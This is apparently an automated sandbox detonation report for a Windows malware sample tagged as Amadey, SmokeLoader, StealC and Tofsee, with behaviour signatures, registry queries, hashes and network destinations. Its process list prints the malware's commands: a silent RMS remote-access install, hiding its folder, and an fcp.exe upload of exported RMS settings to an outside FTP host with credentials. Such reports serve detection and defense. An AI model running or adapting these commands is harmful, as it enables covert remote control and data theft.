Analysis Overview
SHA256
a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
Threat Level: Known bad
The file 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee was found to be: Known bad.
Malicious Activity Summary
Rms family
RMS
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Executes dropped EXE
Identifies Wine through registry keys
Unsecured Credentials: Credentials In Files
Checks computer location settings
Loads dropped DLL
ACProtect 1.3x - 1.4x DLL software
Checks BIOS information in registry
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Runs .reg file with regedit
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: SetClipboardViewer
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-20 14:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-20 14:06
Reported
2025-05-20 14:08
Platform
win11-20250502-en
Max time kernel
148s
Max time network
144s
Command Line
Signatures
RMS
Rms family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\id.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4472 set thread context of 3752 | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 5116 set thread context of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\id.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | C:\Program Files (x86)\System\id.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
C:\Program Files (x86)\System\123.exe
"C:\Program Files (x86)\System\123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files (x86)\System"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /silentinstall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /start
C:\Program Files (x86)\System\rutserv.exe
"C:\Program Files (x86)\System\rutserv.exe"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\regedit.exe
regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
C:\Program Files (x86)\System\id.exe
"C:\Program Files (x86)\System\id.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
C:\Users\Admin\AppData\Local\Temp\fcp.exe
fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ivgenyroman22.hhos.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | x95244d7.beget.tech | udp |
Files
C:\Program Files (x86)\System\test.vbs
| MD5 | 7673f4b5eeccb819272231a4ea32754d |
| SHA1 | 6b1270c4eee7083932833ff9809eae34d50f5b51 |
| SHA256 | 95d605965a9f5b1a7e668156bdb0a6ba4b90a98c6337763eb4acd3bee80ea005 |
| SHA512 | 75f7505f167947ef0cd413c84dc587692450c3db5c03cde95a4712478791ff49afde135f31331e2c138913c728148c34860b7d2424db981625f299762ec8352e |
C:\Program Files (x86)\System\install.vbs
| MD5 | 316840cd95d80c8c879e0812a39e8151 |
| SHA1 | 6b1b804219c028c18311dd5c273b0cc3730c8044 |
| SHA256 | 4631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34 |
| SHA512 | 2295924c9a98fe19432df62503ddd18afb2c0af16168a8c276be4c3cf08ce1d98f1441e0a2a9d0ad68c4f3d843de00084a2303cd268791f25ce25a12d9b90036 |
C:\Program Files (x86)\System\install.bat
| MD5 | cf76cadc2887b23aab4f1f2330968548 |
| SHA1 | f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9 |
| SHA256 | d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef |
| SHA512 | 05ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7 |
C:\Program Files (x86)\System\123.exe
| MD5 | 3b084c7f7c666af58971760174c8f32b |
| SHA1 | b9a21429c6d35abf31eae7235dd3152beaf270fb |
| SHA256 | 3bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96 |
| SHA512 | d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c |
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
| MD5 | bc1b34ecfd1bf476402de205363f6372 |
| SHA1 | 2e97b088b30784c022ae556033d03b4c37b22573 |
| SHA256 | e282df4525b8e9a4ed45f48a708059c94a95709f6e4e9fc502a694047ae818a1 |
| SHA512 | 6510705430305656c90f07e46138226cdefaaa2f7699833e010e0cd65ebaefb1dab8406efe573c90b61179f79fc5a80e5e2a06976c534b64918ff94d197cc9b1 |
C:\Program Files (x86)\System\regedit.reg
| MD5 | fd06d4b501d310100f720d34ce0f7f2a |
| SHA1 | 4a0fedfda6a84c4e1ac6130a837a136947a82dd1 |
| SHA256 | 27997b89ef17f13a84c26cc3a3f7b4b1c6fc782f7257de05fcb204819897d8a3 |
| SHA512 | 9c6e0f09b490ee6b39f8ecd8df1058c5986295148c513a52cdc67da098ee72120db1c7ebc3ca864c7c3dd7ffb196bc2b5289ae06806db2e888dfa5788bf5ed91 |
C:\Program Files (x86)\System\rutserv.exe
| MD5 | b097e79d33b826d728c3bcf635d0c382 |
| SHA1 | dc98020d4feec4dd72754f728a8505f27329561e |
| SHA256 | ba3d97e0051836aad5b6002ce7b00f120bc1b57efbc74ff042f80cd2ba59e96f |
| SHA512 | 0cb3e0db0d07c70eb320707f920bb6ddd09407ab33278498383805275df7bc9e6127049d2336bc6a8eef74e7b171af2f73eff8663f27f304cb8046301da71a64 |
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
| MD5 | 12789da76cc8737b715ffc82dc4be837 |
| SHA1 | c42ce86a036cf61c781731f4baf59b1deafaee3a |
| SHA256 | f34e1e970161c9b7a8a57e164fbd227265cc4d15d2a4b0bdb130f0c1f1bd8235 |
| SHA512 | bdcc89d7bad9899403d4396bb309ca2650de44caf3a35e1062a435077d415a5f103485a7c48bb2809673cff31ff5cd612e85a5f1fe491e7a14a2952ebcb8cf76 |
C:\Users\Admin\Desktop\Key\Key.txt
| MD5 | 7fa85ee66ad3c37306e01a041e48adff |
| SHA1 | a4a56aae1b0979bf72d32df5ed0cdfb33326c7cb |
| SHA256 | 7646355a353d254d4763f35d8859b87a2fb8e9508c7f3f60049fb97e79bc61a0 |
| SHA512 | fce7d75319a4102974d052176d0265bfdeceedca7c2cd35fc34dff9222d3bf49160182a35d1e3f9773a6b38e2c0d47b068dee6e3ec9ea6a769383d654a284802 |
C:\Users\Admin\AppData\Local\Temp\{a8aw6353}.txt
| MD5 | 8ce704458e632d243a023357eec3702f |
| SHA1 | b4857c6a1e277776b8a08c243917eeae5470aa56 |
| SHA256 | 257947aba31142bab41ca56915c2ef843c2a156c527dee5d1a07e1224e380aed |
| SHA512 | a96d4aded8fd5ce2cfeeaba2bc69a399006bc723e1aa0777989648b2fe8caa7b6d421744c2bcd52b633d0e2d41b951df2cbc91ac64054c7b8cb63f887b496449 |
C:\Users\Admin\AppData\Roaming\ptst2Y9U2S6X2Y2Y9U2S6X2Y\General\cards.log
| MD5 | 833406139ec477aabb10628c3b5e75c7 |
| SHA1 | b303b77b367d401e9900bec03e33a2cfb846b7e4 |
| SHA256 | f8d5bf0b8b53fc90f9224504e0a488360c79929eb1c9ee3436d73daa611f17c0 |
| SHA512 | 76f1bae11ab39ea64b2a1daea8aefb56d42e79f8076c31fac27c5d535c28c6cec0dc6ec1dfe9302de5c77706965860ca92fdfb1e915e3a2e9292aec7ef887bd4 |
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Program Files (x86)\System\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Program Files (x86)\System\rfusclient.exe
| MD5 | e96a511519df1055c9b564646a752b2d |
| SHA1 | e75b47954faf9ddd643b23110deca10164f571a0 |
| SHA256 | 3527e45b4ceec9f6526b5ba17d865395e1326f1ede774b0d6487a2146218613a |
| SHA512 | f5b99203d083935aeb4ba2ff1490d4d854afdb5c6ab294b239b8992866cbb5747298531f9e3e8353d64c3d248b0faf128c3f7e79249a30462c3991fbcdd76fc6 |
C:\Program Files (x86)\System\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wVJxOQKKa.exe.log
| MD5 | 7e1ed0055c3eaa0bbc4a29ec1ef15a6a |
| SHA1 | 765b954c1adbb6a6ecc4fe912fdaa6d0fba0ae7d |
| SHA256 | 4c17576f64dea465c45a50573ee41771f7be9962ab2d07f961af4df5589bdcce |
| SHA512 | de7c784c37d18c43820908add88f08ab4864c0ef3f9d158cc2c9d1bab120613cb093dd4bfc5d7ed0c289414956cfe0b213c386f8e6b5753847dec915566297c8 |
C:\Program Files (x86)\System\id.exe
| MD5 | ba67693705f46b37b4f7d427d874d2bb |
| SHA1 | 502546afcab6bf7595d98cded71007ca60c340da |
| SHA256 | f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862 |
| SHA512 | 2258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea |
C:\Users\Admin\AppData\Local\Temp\id.vbs
| MD5 | 21cce90e924d3151a3c041382737cd32 |
| SHA1 | a5714a783cba4d307e243557ad58848e5c18626c |
| SHA256 | 4439fcafd565dfcf294b02cff6170b9a5754171bc2224c55da387a4907e6e9ce |
| SHA512 | 0c33cdb8edfdb2c48590252d9d9670df29d2d860113c9c2f1f998c9a075a23050277a6bfde38025fc89a937f71a27c6383525b5437ba40a7ae2419b32406a478 |
C:\Users\Admin\AppData\Local\Temp\id.bat
| MD5 | 2a9efc9fb8e8aa423aab3b20c46e04c7 |
| SHA1 | 313b324233c048b14e83228a4fa2efc0454b2002 |
| SHA256 | 708ccc3654ced3ad1ebc917d0ae48ba3635464de9b71b05441e2e68526b32f8d |
| SHA512 | 334103136d264a4bf34172a6021582b16856b0e4bcceb958a72a62e92854832fd8620b988922c3b8eb6ae376df84ba4e654cc858ee96eb860ff88089a90ef41b |
C:\Users\Admin\AppData\Local\Temp\fcp.exe
| MD5 | d86fd26b2340cead820b2a905c177c63 |
| SHA1 | 313334f1d8e1a8a9c7473dead0a839c3f9855b86 |
| SHA256 | 6ece2458ddfc2bc9be6d14d1c377b2a52bf502f3757ba8024de383d85899e21b |
| SHA512 | b3dc478779d0e2a93e8fcac0e0a34e3737c8a08b0479203c73fda8f3e3345618d06485a070f17cc6d880d07c3436af4b4ba8df29dc184b0717f3a2753cbb6413 |
C:\Users\Admin\AppData\Local\Temp\pthreadGC.dll
| MD5 | 2d6a905cbe6766adf6da9d4f5a461571 |
| SHA1 | 4700349f065e96c40eb5f50aff554bf5b2eb2c21 |
| SHA256 | d47dc7d06a2873c65758568a16aee0349d87de35d8d6e7c4249f1276e81f14fa |
| SHA512 | 84e79aa2cf1d7d1d31224572f193ce5527504fb58ef79aa5e4fb672188b9dae4a5ebb4e1ba3a7d2958a0a43095023ed9ba2d36604570575fdd594d9b42786848 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-20 14:06
Reported
2025-05-20 14:08
Platform
win10v2004-20250502-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
RMS
Rms family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
